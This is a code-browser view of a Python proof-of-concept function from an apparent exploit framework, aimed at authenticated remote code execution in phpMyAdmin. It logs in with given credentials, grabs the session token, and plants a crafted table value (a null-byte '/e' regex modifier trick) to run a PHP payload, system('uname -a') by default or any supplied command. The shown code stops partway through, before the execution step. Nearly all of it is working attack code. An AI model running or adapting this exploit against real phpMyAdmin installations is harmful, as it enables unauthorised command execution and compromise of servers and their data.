hub / github.com/Xyntax/POC-T / poc

Function poc

script/phpmyadmin-auth-rce.py:30–120  ·  view source on GitHub ↗
(url)

Source from the content-addressed store, hash-verified

30def poc(url):
31 url_to_pma = url
32 uname = USER
33 upass = PASS
34
35 if DATABASE:
36 db = DATABASE
37 else:
38 db = "test"
39
40 custom_table = False
41 if TABLE:
42 custom_table = True
43 table = TABLE
44 else:
45 table = "prgpwn"
46
47 if COMMAND:
48 payload = COMMAND
49 else:
50 payload = "system('uname -a');"
51
52 s = requests.Session()
53 s.verify = False
54 sql = '''CREATE TABLE `{0}` (
55 `first` varchar(10) CHARACTER SET utf8 NOT NULL
56 ) ENGINE=InnoDB DEFAULT CHARSET=latin1;
57 INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500'));
58 '''.format(table)
59
60 # get_token
61 resp = s.post(url_to_pma + "/?lang=en", dict(
62 pma_username=uname,
63 pma_password=upass
64 ))
65 if resp.status_code is 200:
66 token_place = resp.text.find("token=") + 6
67 token = resp.text[token_place:token_place + 32]
68 else:
69 # print("Cannot get valid authorization token.")
70 return False
71
72 if custom_table is False:
73 data = {
74 "is_js_confirmed": "0",
75 "db": db,
76 "token": token,
77 "pos": "0",
78 "sql_query": sql,
79 "sql_delimiter": ";",
80 "show_query": "0",
81 "fk_checks": "0",
82 "SQL": "Go",
83 "ajax_request": "true",
84 "ajax_page_request": "true",
85 }
86 resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies))
87 if resp.status_code == 200:

Callers

nothing calls this directly

Calls 1

formatMethod · 0.80

Tested by

no test coverage detected